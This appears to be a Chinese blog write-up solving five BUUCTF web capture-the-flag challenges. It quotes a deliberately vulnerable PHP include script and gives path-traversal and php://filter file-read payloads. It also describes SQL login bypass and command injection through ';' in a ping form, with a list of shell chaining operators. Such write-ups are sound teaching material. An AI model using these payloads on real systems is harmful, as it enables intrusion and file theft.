BUUCTF刷题-Web方向1~5wp
[极客大挑战 2019]EasySQL
一个sql注入登录框,直接万能密码登录
拿到flag
[极客大挑战 2019]Havefun
打开环境,没有任何信息,查看源码,发现这么一段代码
GET方式传入一个cat请求,并且变量值为dog,即?cat=dog,得到flag
[HCTF 2018]WarmUp
打开环境,是一张图片,查看源码发现source.php目录
访问该目录,并对源码进行分析
<?php
highlight_file(__FILE__); //代码高亮表示
class emmm
{
public static function checkFile(&$page) //检查$page变量
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //设置白名单suorce.php hint.php
if (! isset($page) || !is_string($page)) { //如果$page为空或者非字符串,则输出"you can't see it"
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) { //如果$page包含白名单,则返回true
return true;
}
$_page = mb_substr( //提取从$page开始的字符串,0 ~ mb_strpos返回的结果
$page,
0,
mb_strpos($page . '?', '?') //返回第一次出现?的索引位置(从1开始),如果没有则在末尾补一个(从0开始)
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file']) //传入一个file参数并且不为空
&& is_string($_REQUEST['file']) //检查是否是字符串
&& emmm::checkFile($_REQUEST['file']) //在checkFile函数检查
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
查看hint.php
pyload:
source.php?file=source.php?./../../../../ffffllllaaaagggg
source.php?file=hint.php?./../../../../ffffllllaaaagggg
/ 代表根目录,../ 代表上一级目录 ,./ 代表当前目录
[ACTF2020 新生赛]Include
打开环境有个tips,点进去,该页面有用的信息只有file传参点
查看源码,抓包都无有用信息,故利用file传参点尝试,结合题目名称可能是file伪协议
?file=php://filter/read=convert.base64-encode/resource=flag.php
得出一段base64编码,解码一下
[ACTF2020 新生赛]Exec
打开环境是一个ping命令框,先随便ping一下ip
利用 ; 截断,然后查找flag
常见管道符:
; : 无论前面是否执行,后面都执行
||(逻辑或):前命令失败执行后命令,如果前命令成功则不执行后命令
| :前者结果作为后者参数使用
&& :前命令成功执行后命令,如果失败则不执行后命令
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· 上周热点回顾(2.24-3.2)